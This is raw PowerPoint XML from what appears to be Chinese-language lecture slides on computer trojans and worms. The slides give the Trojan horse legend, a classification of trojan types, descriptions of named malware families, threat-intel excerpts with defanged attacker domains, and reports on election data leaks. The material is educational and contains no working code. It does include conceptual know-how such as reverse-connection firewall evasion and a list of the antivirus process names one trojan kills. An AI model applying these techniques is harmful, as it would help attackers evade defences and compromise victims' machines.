              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>然后，蠕虫程序传染目标主机， 并对目标主机进行现场处理。同时蠕虫程序成声多个副本，重复上述流程。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>现场处理包括：隐藏、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息搜集等。</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342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>先讲个故事，故事发生在在三千多年的古希腊，特洛伊的王子帕里斯爱上了斯巴达国王的妻子——绝世美女海伦。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>王子把她带回了特洛伊古城，这时斯巴达王非常的愤怒，他找到了自己的哥哥，迈锡尼国王阿加伽门农，请求他的的帮忙，阿伽门农正好也希望征服特洛伊，于是借此机会建立了一支希腊联军讨伐特洛伊古城。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>联军围攻了特洛伊古城9年仍未攻下，到了第十年，将领奥德修斯想出一计，将一批勇士藏于一批巨大的木马腹内，放在城外，大部队则佯装退军。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特洛伊人以为敌军已退，就打开城门，打扫战场，并把敌军留下的那只木马作为战利品带进了城中。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>全程饮酒狂饮，到了夜间，全城军民进入梦乡，而埋伏在木马中的勇士们跳了出来，并打开城门四处放火，城外将士一拥而入，部队里应外合，攻下了特洛伊城池。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后代称这只大木马为"特洛伊木马"。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后来，人们在写文章时，就常用"特洛伊木马"这一典故比作在敌方营垒内埋下伏兵里应外合的活动。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>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https://baijiahao.baidu.com/s?id=1743174366651047327&amp;wfr=spider&amp;for=pc</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http://www.bala.cc/jiaoyu/zhuanye/2018/967.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>2020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>年美国大选，说好一起投川普，你却背着我偷偷支持拜登，要不是黑客把信息放在暗网上，我还不知道！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>近1.86亿参加此次总统大选的选民姓名、电子邮件地址、电话号码和选民登记记录的信息数据也都被成批出售。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>犯罪分子完全可以在大选之前、之中和之后，可以很容易的利用这些选民和消费者数据宣传虚假信息，通过社交媒体、电子邮件、网络钓鱼以及电话诈骗实施不法活动。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>近年来黑客对大量公司进行网络攻击，窃取了公民信息，并从政府网站上抓取公开数据，这些数据构成了泄露在暗网上的信息数据。据悉，在美国大多数州，选民登记信息是向外公开的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>我国一批重大间谍案件告破!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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1）破坏型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>破坏并删除文件，自动删除电脑上的dll、EXE等文件，以达到使被感染的电脑瘫痪的目的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2）密码发送型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>密码发送型的木马正是专门为了盗取被感染计算机上的密码而编写的，该木马一旦被执行，就会自动搜索内存，Cache，临时文件夹以及各种敏感密码文件，一旦搜索到有用的密码，木马就会利用免费的电子邮件服务将密码发送到指定的邮箱。从而达到获取密码的目的，所以这类木马大多使用25号端口发送E-mail。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>3）远程访问型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程访问型木马程序一般包括客户端程序和服务端程序，在目标主机上执行了服务端程序之后，只要用户知道目标主机的IP地址或主机名，就可以与目标主机连接，连接成功后，用户通过客户端程序提供的远程操作功能就可以实现对目标主机的监视与控制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大名鼎鼎的木马冰河就是一个远程访问型特洛伊木马。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>4）键盘记录木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>记录目标主机用户的键盘操作且将键盘操作记录在文件中，入侵者可以获取这些文件并在文件中获取诸如密码等有用的信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对于这种类型的木马，邮件发送功能也是必不可少的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>5）Dos攻击木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Dos全名是Denial of service（拒绝服务）。它故意攻击网络协议的缺陷或直接通过某种手段耗尽被攻击对象的资源，目的是让目标计算机或网络无法提供正常的服务或资源访问，使目标系统服务停止响应甚至崩溃。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当黑客侵入一台计算机并种上了DOS攻击木马后，日后这台计算机就成了黑客DOS攻击的最得力的帮手。黑客控制的计算机数量越多，发动DOS攻击取得成功的概率就越大，所以，这种木马的危害不是体现在被感染的计算机上，而是体现在攻击者可以利用它来攻击网络上的其他的计算机。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>全名是 ()，很多攻击源一起攻击某台服务器就组成了DDOS攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>6）代理木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>给被控制的肉鸡种上代理木马，让其变成入侵者发动攻击的跳板就是代理木马最重要的任务。通过代理木马，入侵者可以在匿名的情况下使用Telnet等程序，从而隐蔽自己的踪迹。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>7）FTP木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这种木马可能是最简单和古老的木马了，它的惟一功能就是打开21端口，等待用户连接。现在新FTP木马还加上了密码功能，这样，只有攻击者本人才知道正确的密码，从而进入对方的计算机。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>8）程序杀手木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常见的查杀木马软件有瑞星，Norton Anti-Virus及木马清除大师等。程序杀手木马的功能就是关闭目标机器上运行的木马查杀程序，让木马更好地发挥作用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>9）反弹端口型木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马开发者在分析了防火墙的特性后发现 ：防火墙对于连入的链接往往会进行非常严格的过滤，但是对于连出的链接却疏于防范。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>于是，与一般的木马相反，反弹端口型木马在服务端 (被控制端)使用主动端口，客户端 (控制端)使用被动端口。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马定时监测客户端（控制端）的存在，发现客户端（控制端）上线立即主动连接控制端打开的主动端口；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为了隐蔽起见，客户端 (控制端)的被动端口一般设置为80（浏览网页必须开的端口），这样，即使用户使用端口扫描软件检查自己的端口，发现的也是类似TCP UserIP:1026 ControllerIP:80 ESTABLISHED的情况，不明真相的用户就会以为自己在浏览网页，并且，防火墙一般不会禁止用户向外连接80端口。</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广外女生木马，这个木马是广东外语外贸大学，广外女生”网络小组的作品，广外女生木马（Trojan.GWGirls10a.192000）类似灰鸽子，是在灰鸽子之后，2001年左右出现的远程监控工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件管理方面有上传，下载，删除，改名，设置属性，建立文件夹和运行指定文件等功能；注册表操作方面：全面模拟WINDOWS的注册表编辑器，让远程注册表编辑工作有如在本机上操作一样方便；屏幕控制方面：可以自定义图片的质量来减少传输的时间，在局域网或高网速的地方还可以全屏操作对方的鼠标（包括单击，双击，右键，拖动等）；其他功能还有远程任务管理、邮件IP通知、邮件服务等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>“广外女生”木马的可怕之处在于其服务端被执行之后，将自动检查进程中是否含有金山毒霸、防火墙、iparmor、tcmonitor、实时监控、lockdowt、kill、天网等字样，如果发现就将该进程终止，也就是所谓的使防火墙完全禁用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>“网络神偷（Trojan.Nethief.46）类似灰鸽子，”木马：警惕程度★★★★，通过网络传播，依赖系统： WIN8/7/NT/2000/XP。病毒会将自己拷贝到系统目录下命名为：Iexplorer.exe，然后在注册表的自启动项中添加“Internet Explorer”的病毒键值。运行时会每隔一分钟就连接一次病毒网站，并与病毒作者进行沟通，企图控制用户的电脑，给用户带来损失。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在2006年之前，冰河在国内一直是不可动摇的领军木马，在国内没用过冰河的人等于没用过木马，由此可见冰河木马在国内的影响力之巨大。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：远程访问、控制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>选择：可人为制造受害者和寻找"养马场"，选择前者的基本上可省略扫描的步骤。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1．自动跟踪目标机屏幕变化，同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕变化的同时，监控端的一切键盘及鼠标操作将反映在被控端屏幕（局域网适用）；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2．记录各种口令信息：包括开机口令、屏保口令、各种共享资源口令及绝大多数在对话框中出现过的口令信息；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>3．获取系统信息：包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前显示分辨率、物理及逻辑磁盘信息等多项系统数据；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>4．限制系统功能：包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册表等多项功能限制；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>5．远程文件操作：包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏览文本文件、远程打开文件（提供了四中不同的打开方式——正常方式、最大化、最小化和隐藏方式）等多项文件操作功能；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>6．注册表操作：包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表操作功能；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>7．发送信息：以四种常用图标向被控端发送简短信息；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>8．点对点通讯：以聊天室形式同被控端进行在线交谈。</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披露时间：2022年09月09日</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>情报来源：https://mp.weixin.qq.com/s/AXORtlDzPTgiWoSxhEJsKA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>近期，研究人员监测到一批伪装成CorelDraw、Notepad++、IDA Pro、WinHex等多款实用软件进行传播的窃密木马。通过跟踪监测发现其每日上线境内肉鸡数（以IP数计算）最多已超过1.3万，由于该窃密木马会收集浏览器书签、邮箱账户等信息，故将其命名为“魔盗”。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者利用“cdr[.]jyxwlkj.cn”及“cdrnb[.]jyxwlkj.cn”域名建立多个软件下载页面，用于投放伪装成实用软件的“魔盗”窃密木马。窃密木马运行后会收集受害者主机中已安装的软件列表与多款浏览器的历史记录、书签数据和邮件客户端邮箱账户信息，并加密回传至攻击者服务器。由于部分恶意程序具备在线升级能力，因此攻击者可随时更改攻击载荷（如勒索、挖矿、窃密等不同目的的攻击载荷），给受害者造成更大损失。</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披露时间：2022年09月09日</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>情报来源：https://mp.weixin.qq.com/s/AXORtlDzPTgiWoSxhEJsKA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>近期，研究人员监测到一批伪装成CorelDraw、Notepad++、IDA Pro、WinHex等多款实用软件进行传播的窃密木马。通过跟踪监测发现其每日上线境内肉鸡数（以IP数计算）最多已超过1.3万，由于该窃密木马会收集浏览器书签、邮箱账户等信息，故将其命名为“魔盗”。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者利用“cdr[.]jyxwlkj.cn”及“cdrnb[.]jyxwlkj.cn”域名建立多个软件下载页面，用于投放伪装成实用软件的“魔盗”窃密木马。窃密木马运行后会收集受害者主机中已安装的软件列表与多款浏览器的历史记录、书签数据和邮件客户端邮箱账户信息，并加密回传至攻击者服务器。由于部分恶意程序具备在线升级能力，因此攻击者可随时更改攻击载荷（如勒索、挖矿、窃密等不同目的的攻击载荷），给受害者造成更大损失。</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https://view.inews.qq.com/a/20220908A039MN00</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https://zhuanlan.zhihu.com/p/68155266</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年，纪录片《大国重器》（第二季）正式回归，影片中腾讯安全联合实验室便向观众全面还原了2017年影响用户人数最大的“暗云Ⅲ”木马攻防战。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>据了解，“暗云”是目前已知复杂度最高、感染用户数量最大的木马之一。它们如同僵尸一样，被黑客深埋在电脑启动磁盘中，平时不影响电脑使用。</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https://zhuanlan.zhihu.com/p/68155266</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年，360安全中心紧急预警了一款感染MBR（磁盘主引导记录）的“隐魂”木马，该木马捆绑在大量色情播放器的安装包中诱导网民下载，入侵后劫持浏览器主页并安插后门实现远程控制。据统计，短短两周内，“隐魂”木马的攻击量已达上百万次，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>迄今传播速度最快的MBR木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>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https://zhuanlan.zhihu.com/p/68155266</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年 今年的端午“巧遇”父亲节，又恰逢“618”电商年中大促，众多节点交集在一起，各大电商平台纷纷推出促销活动。然而，一些不法分子却从中发现了“商机”，将编制的木马病毒伪装成正常软件进行大肆投毒。病毒入侵后会劫持电脑浏览器并导航到指定促销页面，病毒作者则凭借访问流量赚取推广佣金。</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https://zhuanlan.zhihu.com/p/68155266</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>该家族主要通过盗版ghost系统预装、激活工具捆绑、下载器等方式进行传播推广，落地功能模块主要用于浏览器劫持、推广安装、病毒推送等恶意行为，腾讯安全团队(命名为“独狼”)和360安全团队(命名为“幽虫”家族)在2018年都相继进行过分析披露，该家族rootkit模块功能相对完善，包含文件系统过滤、注册表过滤、网络过滤、进程镜像过滤等多种技术对抗杀软查杀。从我们的历史观测数据来看，早在2017年该家族就已经开始出现，从2018年中至2019年初保持较高活跃度，每月都有版本迭代更新，本次截获的最新变种还加入了DDOS等木马家族推送。</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https://zhuanlan.zhihu.com/p/68155266</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年腾讯智慧安全御见威胁情报中心监测发现,“外挂幽灵”团伙持续活跃</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“让你的每一位粉丝都能感到一对一的互动，而不是被遗漏。”混迹直播圈多年的朱某显然深谙粉丝和主播互动的重要性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>朱某就像是一名“黄金矿工”，在购买过一款短视频场控机器人的外挂软件后，敏锐发现了场控外挂的巨大市场和发展潜力。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>3月底，他找到位于福建的“技术大神”林某，两人一拍即合，速度开发了用于主播线上直播的外挂软件“CK智能场控”。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不同于以往我们所熟知的游戏外挂，CK智能场控定位更精准，服务对象主要是网络主播，产品功能聚焦于直播间的自动欢迎、自动关注答谢、自动送礼答谢、虚拟定位等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>而大多数外挂程序基本都要突破该安全措施，甚至加密协议等进一步的安全措施，继而超越应用授权重新组合出原程序没有的新功能，因而提供外挂的行为涉嫌提供侵入、非法控制计算机信息系统的程序、工具罪。</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https://zhuanlan.zhihu.com/p/64240313</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汉密尔顿警告说：“最危险的日子是11月4日，各县都将受到勒索软件的威胁。因为到那时，面对面的投票已经完成，投票结果已经制成表格。”他说，“如果勒索软件袭击一个县（仅由县进行选举），邮寄数量将受到质疑。因为众所周知共和党人会在选举日亲自投票，而民主党人则倾向于邮寄选票，所以这是一种危险。”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> “勒索软件是否真的可以'更改投票记录'并不重要，因为如果攻击者有足够的网络访问权限来加密锁定数据，就一定有足够的权限来更改数据。”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&amp;mid=2651093490&amp;idx=1&amp;sn=ca18dfd65768088f7c0dfa4b720c3f0e&amp;chksm=bd14c9218a634037ca08b6347881dfbad56d07583c2a6a61a207e1c468e9b0af245be811bbd4&amp;mpshare=1&amp;scene=1&amp;srcid=1104jbfg3Sf3zicSU4yfreyg&amp;sharer_sharetime=1604461999072&amp;sharer_shareid=957f4116be9d8d0498700f34a428e0b6&amp;key=fd0a4996ee3b534cac69dfaadcde203c37ac4c7804248887a8dc1a6f1e0b6f6a1400ac2d869f164b21ab8a0fe6399c11a93321a1a6b09d3a02784d6fa6a6979517d335d2777ebf8106e28ab35bbb53f453bb4f1559a24981d3758d64cbc96d97e9aef32f4b79e08d8d899040f155ca72aed2d927661e46753d1090987c070048&amp;ascene=1&amp;uin=MTA5MDY0MzU4MA%3D%3D&amp;devicetype=Windows+10+x64&amp;version=6300002f&amp;lang=zh_CN&amp;exportkey=AWBJABi1mZ5PWXFd1%2FEccv4%3D&amp;pass_ticket=Nyn7flo93bHECSLz5wbEF7DYAsBBZEINXkVaw6Dh0wHclEPJMakMoeIQGFl7FTyT&amp;wx_header=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
